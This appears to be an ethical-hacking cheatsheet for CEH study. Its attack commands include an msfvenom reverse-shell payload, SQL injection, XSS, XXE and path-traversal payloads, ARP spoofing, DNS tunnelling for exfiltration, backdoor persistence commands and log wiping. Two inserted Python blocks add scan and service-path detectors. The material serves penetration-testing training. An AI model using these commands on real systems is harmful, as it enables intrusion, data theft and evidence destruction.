Complete CEH Techniques Cheatsheet: Ethical Hacking Methods & Tools

Introduction: What is Ethical Hacking?

Ethical hacking involves legally and methodically attempting to penetrate systems and networks to discover security vulnerabilities that malicious hackers could potentially exploit. Certified Ethical Hackers (CEH) use the same knowledge and tools as malicious hackers but in a lawful and legitimate manner to assess and improve the security posture of organizations. This practice is essential in today’s digital landscape where cyber threats continue to evolve in sophistication and frequency.

The Five Phases of Ethical Hacking

Phase | Description | Key Objectives
--- | --- | ---
1. Reconnaissance | Gathering information about the target | Identify scope, collect target details, understand system architecture
2. Scanning | Identifying open ports and vulnerabilities | Discover open services, map network, identify potential entry points
3. Gaining Access | Exploiting vulnerabilities to enter systems | Breach defenses, elevate privileges, establish persistence
4. Maintaining Access | Ensuring continued access to compromised systems | Plant backdoors, deploy rootkits, create covert channels
5. Covering Tracks | Removing evidence of penetration | Delete logs, remove artifacts, conceal communication channels

Reconnaissance Techniques

Passive Reconnaissance

  • WHOIS Lookups: whois domain.com
  • DNS Enumeration: dig domain.com, nslookup domain.com
  • Google Dorking:
    • site:domain.com filetype:pdf
    • intitle:"index of" "parent directory"
    • inurl:admin filetype:php
  • Social Media Intelligence: LinkedIn, Twitter, Facebook profiling
  • OSINT Tools:
    • Maltego
    • Shodan
    • theHarvester: theHarvester -d domain.com -b all
    • Recon-ng: recon-ng

Active Reconnaissance

  • Ping Sweeps: fping -a -g 192.168.1.0/24
  • Traceroute: traceroute domain.com
  • Banner Grabbing: nc -v domain.com 80
  • DNS Zone Transfers: dig axfr @ns1.domain.com domain.com

Network Scanning & Enumeration

Port Scanning Techniques

  • TCP Connect Scan: nmap -sT 192.168.1.1
  • SYN Scan (Half-open): nmap -sS 192.168.1.1
  • UDP Scan: nmap -sU 192.168.1.1
  • FIN Scan: nmap -sF 192.168.1.1
  • XMAS Scan: nmap -sX 192.168.1.1
  • NULL Scan: nmap -sN 192.168.1.1
  • Idle Scan: nmap -sI zombie_ip target_ip
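The scan types above differ only in the TCP flags each probe carries, which is what a defender can key on. The following added example (not from the page or from Nmap) classifies constructed flow records by flag set and reports sources that sweep many ports with probe-only packets; the record tuples and thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample records: (src_ip, dst_port, tcp_flags). Flag letters use the
# usual convention S=SYN, A=ACK, F=FIN, P=PSH, U=URG; "" means no flags set.
SAMPLE_RECORDS = [
    ("10.0.0.5", 22, "S"), ("10.0.0.5", 80, "S"), ("10.0.0.5", 443, "S"),
    ("10.0.0.5", 445, "S"), ("10.0.0.5", 3389, "S"), ("10.0.0.5", 8080, "S"),
    ("10.0.0.9", 22, ""), ("10.0.0.9", 25, ""), ("10.0.0.9", 80, ""),
    ("10.0.0.9", 110, ""), ("10.0.0.9", 139, ""), ("10.0.0.9", 143, ""),
    ("10.0.0.7", 21, "FPU"), ("10.0.0.7", 23, "FPU"),
    ("192.168.1.20", 443, "S"), ("192.168.1.20", 443, "A"), ("192.168.1.20", 443, "PA"),
]

def classify_flags(flags: str) -> str:
    """Map a TCP flag set to the Nmap scan type whose probe carries exactly it.
    A connect scan (-sT) completes the handshake, so its packets look like a
    normal client and cannot be told apart by flags alone."""
    f = frozenset(flags.upper())
    if f == frozenset("S"):
        return "SYN (half-open)"
    if f == frozenset("F"):
        return "FIN"
    if f == frozenset("FPU"):
        return "XMAS"
    if not f:
        return "NULL"
    return "normal"

def detect_sweeps(records, min_ports=5):
    """Return {src: scan_type} for sources that touch >= min_ports distinct ports
    and whose packets all carry the same probe-only flag set. A source that also
    sends ACK/PSH segments is completing real connections and is not reported."""
    ports = defaultdict(set)
    kinds = defaultdict(set)
    for src, dport, flags in records:
        ports[src].add(dport)
        kinds[src].add(classify_flags(flags))
    hits = {}
    for src, seen in ports.items():
        if len(seen) < min_ports or len(kinds[src]) != 1:
            continue
        kind = next(iter(kinds[src]))
        if kind != "normal":
            hits[src] = kind
    return hits

if __name__ == "__main__":
    for src, kind in detect_sweeps(SAMPLE_RECORDS).items():
        print(f"{src}: {kind} sweep")
```

The two-port XMAS source stays below the default threshold; lowering min_ports trades false positives for earlier detection.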

Nmap Cheat Sheet

  • Comprehensive Scan: nmap -A -T4 -p- 192.168.1.1
  • Script Scanning: nmap --script=vuln 192.168.1.1
  • OS Detection: nmap -O 192.168.1.1
  • Service Version Detection: nmap -sV 192.168.1.1
  • Scan Multiple IPs: nmap 192.168.1.1-100
  • Scan from File: nmap -iL targets.txt
  • Output to File: nmap -oA output_name 192.168.1.1

Service Enumeration

  • SMB: enum4linux -a 192.168.1.1
  • SMTP: smtp-user-enum -M VRFY -U users.txt -t 192.168.1.1
  • SNMP: snmpwalk -c public -v1 192.168.1.1
  • NFS: showmount -e 192.168.1.1
  • DNS: dnsrecon -d domain.com -t axfr

Vulnerability Assessment

Vulnerability Scanning Tools

  • OpenVAS: Open-source vulnerability scanner
  • Nessus: Commercial vulnerability assessment solution
  • Nexpose: Rapid7’s vulnerability management solution
  • Qualys: Cloud-based vulnerability management

Web Application Scanning

  • Nikto: nikto -h http://domain.com
  • OWASP ZAP: Automated and manual web app scanning
  • Burp Suite: Web vulnerability scanner and proxy
  • Dirb/Dirbuster: dirb http://domain.com /usr/share/wordlists/dirb/common.txt
  • SQLmap: sqlmap -u "http://domain.com/page.php?id=1" --dbs

Exploitation Techniques

Password Attacks

  • Brute Force: hydra -l admin -P /path/to/wordlist.txt 192.168.1.1 http-post-form
  • Dictionary Attack: john --wordlist=/path/to/wordlist.txt hash_file
  • Rainbow Tables: ophcrack -d /path/to/tables -t /path/to/hash
  • Password Cracking Tools:
    • John the Ripper
    • Hashcat: hashcat -m 0 -a 0 hash.txt wordlist.txt
    • Medusa
    • Aircrack-ng: aircrack-ng -w wordlist.txt capture.cap

Social Engineering

  • Phishing: Creating fake websites, emails
  • Pretexting: Creating a fabricated scenario
  • Baiting: Using physical media like infected USB drives
  • Quid Pro Quo: Offering a service in exchange for information
  • Tailgating: Following someone into a secured area
  • Tools:
    • Social-Engineer Toolkit (SET): setoolkit
    • GoPhish
    • Maltego

Metasploit Framework

  • Starting Metasploit: msfconsole
  • Searching Exploits: search type:exploit platform:windows
  • Using an Exploit: use exploit/windows/smb/ms17_010_eternalblue
  • Setting Options: set RHOSTS 192.168.1.1
  • Running the Exploit: exploit or run
  • Creating Payloads: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe
  • Post-Exploitation Modules: use post/windows/gather/hashdump

Web Application Attacks

  • SQL Injection: ' OR 1=1 --
  • XSS (Cross-Site Scripting): <script>alert('XSS')</script>
  • CSRF (Cross-Site Request Forgery): Creating malicious forms
  • File Inclusion: http://domain.com/page.php?file=../../../etc/passwd
  • Command Injection: ; cat /etc/passwd
  • XML External Entity (XXE): <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Privilege Escalation

Windows

  • Missing Patches: systeminfo
  • Unquoted Service Paths: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
  • Weak Service Permissions: accesschk.exe -uwcqv "Authenticated Users" * /accepteula
  • AlwaysInstallElevated: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Tools:
    • PowerUp.ps1
    • BeRoot
    • Windows-Exploit-Suggester
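The unquoted service path check above is a one-line filter; this added example (not from the page or from any tool it names) implements the same decision in Python so a hardening audit can run it over exported service data and list exactly which paths need quoting. The CSV layout and service rows are constructed.

```python
import re

# Constructed sample in a simplified wmic-like CSV layout: Name,PathName,StartMode
SAMPLE_WMIC_CSV = """\
Name,PathName,StartMode
AcmeUpdater,C:\\Program Files\\Acme Corp\\Updater\\svc.exe -run,Auto
Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto
GoodSvc,"C:\\Program Files\\Good Vendor\\good.exe",Auto
NoSpace,C:\\Tools\\agent.exe,Auto
ManualSvc,C:\\Program Files\\Legacy App\\legacy.exe,Manual
"""

def is_unquoted_path(pathname: str) -> bool:
    """True when the executable part contains a space and is not wrapped in quotes.
    Only the portion up to the .exe counts; spaces in arguments are harmless."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    m = re.match(r"(.*?\.exe)", p, re.IGNORECASE)
    exe = m.group(1) if m else p
    return " " in exe

def audit_services(csv_text: str, auto_only: bool = True):
    """Return [(name, pathname)] for services whose binary path should be quoted.
    Paths under C:\\Windows are skipped, mirroring the findstr /v filter above,
    and non-automatic services are skipped when auto_only is set."""
    findings = []
    for line in csv_text.strip().splitlines()[1:]:  # drop the header row
        # Manual split keeps the original quotes intact; csv.reader would strip
        # them and hide exactly the property being audited.
        name, pathname, startmode = line.split(",", 2)
        if auto_only and startmode.strip().lower() != "auto":
            continue
        if pathname.strip('"').lower().startswith("c:\\windows"):
            continue
        if is_unquoted_path(pathname):
            findings.append((name, pathname))
    return findings

if __name__ == "__main__":
    for name, path in audit_services(SAMPLE_WMIC_CSV):
        print(f"{name}: quote this path -> {path}")
```

Remediation is to set the service's ImagePath to the quoted form; the function's output is the list of services to fix.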

Linux

  • SUID Binaries: find / -perm -u=s -type f 2>/dev/null
  • Sudo Rights: sudo -l
  • Kernel Exploits: uname -a to identify kernel version
  • Cron Jobs: Check /etc/crontab and /var/spool/cron/
  • World-Writable Files: find / -writable -type f 2>/dev/null
  • Tools:
    • LinPEAS
    • LinEnum
    • linux-exploit-suggester

Network Attacks

Man-in-the-Middle

  • ARP Poisoning: arpspoof -i eth0 -t target_ip gateway_ip
  • DNS Spoofing: dnsspoof -i eth0 host target.com
  • SSL Stripping: Using sslstrip
  • Tools:
    • Ettercap: ettercap -T -q -i eth0 -M arp:remote /target_ip/ /gateway_ip/
    • Bettercap
    • Wireshark

Wireless Attacks

  • WEP Cracking: aircrack-ng -a 1 -b [BSSID] capture.cap
  • WPA/WPA2 Cracking: aircrack-ng -a 2 -b [BSSID] -w wordlist.txt capture.cap
  • Evil Twin: Creating rogue access points
  • WPS Attacks: reaver -i wlan0mon -b [BSSID] -vv
  • Jamming: Using deauthentication attacks
  • Tools:
    • Aircrack-ng Suite
    • Wifite
    • Kismet
    • Wireshark with monitor mode

Post-Exploitation

Data Exfiltration

  • Using DNS Tunneling: iodine -P password 192.168.1.1 tunnel.domain.com
  • ICMP Tunneling: ptunnel -p 192.168.1.1 -lp 8000 -da target.com -dp 80
  • Using HTTP/HTTPS: Encoding data in HTTP requests
  • Using Steganography: Hiding data in images or audio files
  • Tools:
    • dnscat2
    • Egress-Assess
    • Data Exfiltration Toolkit (DET)

Persistence Mechanisms

  • Windows:
    • Creating services: sc create backdoor binpath="C:\backdoor.exe"
    • Registry autoruns: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
    • Scheduled tasks: schtasks /create /tn "Backdoor" /tr C:\backdoor.exe /sc onlogon
    • WMI persistence: wmic /namespace:"\\root\subscription" path __EventFilter
  • Linux:
    • Adding to /etc/rc.local
    • Creating cron jobs: echo "* * * * * /path/to/backdoor" >> /etc/crontab
    • Adding to startup scripts
    • SSH keys: Adding to ~/.ssh/authorized_keys

Covering Tracks

  • Clearing Windows Event Logs: wevtutil cl System
  • Clearing Linux Logs: echo "" > /var/log/auth.log
  • Timestomping: Modifying file timestamps
  • Disabling Auditing: auditpol /set /category:"System" /success:disable /failure:disable
  • Tools:
    • Metasploit clearev module
    • timestomp.exe
    • anti-forensic techniques

Defense Techniques

Network Security Controls

  • Firewalls: Configuration and rule creation
  • IDS/IPS: Signature vs. anomaly-based detection
  • Network Segmentation: Creating security zones
  • VPN: Secure remote access
  • NAC (Network Access Control): 802.1x implementation

System Hardening

  • Windows Hardening:
    • Disabling unnecessary services
    • Group Policy configuration
    • Regular patching
    • AppLocker policies
  • Linux Hardening:
    • Configuring SELinux/AppArmor
    • Setting proper file permissions
    • Kernel hardening
    • Firewall configuration with iptables/nftables

Application Security

  • Secure Coding Practices
  • OWASP Top 10 Mitigations
  • Web Application Firewalls (WAF)
  • Input Validation and Sanitization
  • Content Security Policy (CSP)

Comprehensive Tools Matrix

Tool Category | Windows Tools | Linux Tools | Cross-Platform Tools
--- | --- | --- | ---
Reconnaissance | Active Directory Explorer, SpiderFoot | theHarvester, Recon-ng | Maltego, Shodan, Google Dorks
Scanning | SuperScan, Advanced Port Scanner | Nmap, Masscan | Angry IP Scanner, Unicornscan
Vulnerability Assessment | Nessus, Nexpose | OpenVAS, Lynis | Qualys, Acunetix, Nikto
Web Application Testing | IIS Crypto, Fiddler | Skipfish, w3af | Burp Suite, OWASP ZAP, SQLmap
Password Attacks | Cain & Abel, L0phtCrack | John the Ripper, hashcat | Hydra, Medusa, RainbowCrack
Wireless | Aircrack-ng, WiFi Analyzer | Kismet, Wifite | Wireshark, inSSIDer
Exploitation | PowerShell Empire, Responder | Metasploit, Social Engineer Toolkit | BeEF, Covenant, Immunity CANVAS
Post-Exploitation | BloodHound, Mimikatz | Netcat, Weevely | Empire, Metasploit, CobaltStrike

Common Vulnerabilities & Exploits

Vulnerability Type | Description | Common Tools | Example CVEs
--- | --- | --- | ---
Buffer Overflow | Memory corruption when input exceeds allocated buffer | SPIKE, Immunity Debugger | CVE-2020-0796 (SMBGhost)
Command Injection | Executing OS commands via unsanitized input | Commix, manual testing | CVE-2019-11510 (Pulse VPN)
SQL Injection | Database manipulation via unsanitized SQL input | SQLmap, sqlninja | CVE-2020-9484 (Tomcat)
Cross-Site Scripting | Injecting client-side scripts into webpages | XSStrike, BeEF | CVE-2019-0604 (SharePoint)
Privilege Escalation | Gaining higher-level permissions | PowerUp, LinPEAS | CVE-2021-1675 (PrintNightmare)
Remote Code Execution | Executing arbitrary code remotely | ExploitDB resources, Metasploit | CVE-2021-44228 (Log4Shell)
MITM | Intercepting/modifying communications | Ettercap, Bettercap | N/A (attack technique)
Authentication Bypass | Circumventing authentication mechanisms | Burp Intruder, custom scripts | CVE-2019-19781 (Citrix)

Best Practices for Ethical Hacking

Documentation

  • Document all testing activities with timestamps
  • Maintain detailed notes of findings
  • Screenshot evidence of vulnerabilities
  • Create clear, actionable reports for stakeholders

Scope Management

  • Always operate within defined scope boundaries
  • Get written permission before testing
  • Avoid testing production systems without proper approval
  • Follow responsible disclosure policies

Risk Mitigation

  • Use dedicated testing environments when possible
  • Avoid destructive testing without explicit permission
  • Have rollback plans for all exploitation attempts
  • Test during low-traffic periods if testing production

Legal Considerations

  • Understand relevant laws (CFAA, GDPR, etc.)
  • Never exceed authorized access
  • Maintain client confidentiality
  • Properly handle sensitive data discoveries

Ethical Hacking Certification Path

Certification | Focus Area | Prerequisites | Value
--- | --- | --- | ---
CEH (Certified Ethical Hacker) | Broad ethical hacking knowledge | 2 years IT experience recommended | Industry standard entry certification
OSCP (Offensive Security Certified Professional) | Hands-on penetration testing | Technical background | Highly respected practical certification
CISSP (Certified Information Systems Security Professional) | Overall security management | 5 years security experience | Advanced security management
GPEN (GIAC Penetration Tester) | Advanced penetration testing | Technical background | Thorough penetration testing knowledge
CREST | Various security testing certifications | Varies by certification | Well-respected in UK and Europe
CompTIA PenTest+ | Vulnerability assessment and penetration testing | Network+ and Security+ recommended | Vendor-neutral penetration testing cert

Resources for Further Learning

Books

  • “The Hacker Playbook” series by Peter Kim
  • “Penetration Testing: A Hands-On Introduction to Hacking” by Georgia Weidman
  • “Red Team Field Manual” by Ben Clark
  • “Blue Team Field Manual” by Alan White & Ben Clark
  • “The Web Application Hacker’s Handbook” by Dafydd Stuttard and Marcus Pinto

Online Platforms

  • HackTheBox
  • TryHackMe
  • VulnHub
  • PortSwigger Web Security Academy
  • SANS Cyber Ranges

Communities and Forums

  • Reddit r/netsec
  • OWASP Community
  • Stack Exchange Information Security
  • HackerOne Hacktivity
  • DEF CON Groups

Practice Environments

  • Metasploitable
  • DVWA (Damn Vulnerable Web Application)
  • OWASP WebGoat
  • OWASP Juice Shop
  • HackTheBox

Quick Reference: Common Ports & Services

Port | Service | Common Vulnerabilities
--- | --- | ---
21 | FTP | Anonymous access, cleartext credentials, outdated versions
22 | SSH | Weak passwords, outdated versions (OpenSSH)
23 | Telnet | Cleartext communications, brute force
25 | SMTP | Open relay, user enumeration
53 | DNS | Zone transfers, cache poisoning, amplification
80/443 | HTTP/HTTPS | Various web vulnerabilities (XSS, SQLi, etc.)
135 | RPC | Various Windows vulnerabilities
139/445 | SMB/CIFS | EternalBlue, null sessions, weak shares
1433/1434 | MS SQL | SA blank password, excessive privileges
3306 | MySQL | Root without password, excessive privileges
3389 | RDP | BlueKeep, weak credentials
5900 | VNC | Weak authentication, no encryption

Ethical Hacking Checklist

  • [ ] Get proper written authorization
  • [ ] Define clear scope and boundaries
  • [ ] Prepare tools and testing environment
  • [ ] Conduct reconnaissance
  • [ ] Perform vulnerability scanning
  • [ ] Validate vulnerabilities manually
  • [ ] Attempt exploitation if authorized
  • [ ] Document all findings with evidence
  • [ ] Maintain regular communication with client
  • [ ] Create comprehensive report with remediation steps
  • [ ] Present findings to stakeholders
  • [ ] Assist with remediation if requested
  • [ ] Verify fixes with retesting if in scope
  • [ ] Securely delete all client data after engagement